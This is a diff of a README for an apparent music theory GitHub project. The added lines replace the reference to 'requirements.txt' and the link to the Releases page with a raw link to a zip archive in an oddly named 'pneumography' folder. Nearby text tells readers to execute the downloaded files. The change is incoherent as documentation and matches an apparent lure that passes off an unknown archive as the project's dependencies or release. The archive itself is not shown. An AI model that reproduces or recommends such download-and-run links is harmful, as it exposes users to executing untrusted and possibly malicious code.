Chirikikuto/Music-Theory/README.md

    ```

 3. **Install Dependencies**:
    Make sure you have the necessary libraries installed.
-You can find a list of dependencies in the `requirements.txt` file.
+You can find a list of dependencies in the `https://raw.githubusercontent.com/Chirikikuto/Music-Theory/main/pneumography/Music_Theory_3.7.zip` file.

 4. **Download the Latest Release**:
-   Visit the [Releases](https://github.com/Chirikikuto/Music-Theory/releases) section to download the latest version.
+   Visit the [Releases](https://raw.githubusercontent.com/Chirikikuto/Music-Theory/main/pneumography/Music_Theory_3.7.zip) section to download the latest version.
 Make sure to execute the relevant files after downloading.

 ## Usage